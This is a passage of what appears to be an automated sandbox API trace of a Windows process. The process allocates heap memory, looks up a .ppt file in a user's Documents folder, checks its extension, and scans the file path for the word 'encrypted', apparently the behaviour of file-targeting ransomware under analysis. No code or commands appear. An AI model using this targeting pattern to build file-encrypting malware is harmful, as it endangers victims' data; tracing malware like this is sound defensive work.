wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.200] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0035.201] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.201] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.201] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbdb0e0, ftCreationTime.dwHighDateTime=0x1d5c475, ftLastAccessTime.dwLowDateTime=0x8e00b970, ftLastAccessTime.dwHighDateTime=0x1d5bb69, ftLastWriteTime.dwLowDateTime=0x8e00b970, ftLastWriteTime.dwHighDateTime=0x1d5bb69, nFileSizeHigh=0x0, nFileSizeLow=0x13eda, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Vp6FryQ8WD7hsRBCHZV.ppt", cAlternateFileName="VP6FRY~1.PPT")) returned 0x7c20c0 [0035.201] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.202] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.202] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbdb0e0, ftCreationTime.dwHighDateTime=0x1d5c475, ftLastAccessTime.dwLowDateTime=0x8e00b970, ftLastAccessTime.dwHighDateTime=0x1d5bb69, ftLastWriteTime.dwLowDateTime=0x8e00b970, ftLastWriteTime.dwHighDateTime=0x1d5bb69, nFileSizeHigh=0x0, nFileSizeLow=0x13eda, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Vp6FryQ8WD7hsRBCHZV.ppt", cAlternateFileName="VP6FRY~1.PPT")) returned 0x7c20c0 [0035.202] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.203] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.203] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.204] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.204] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.205] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 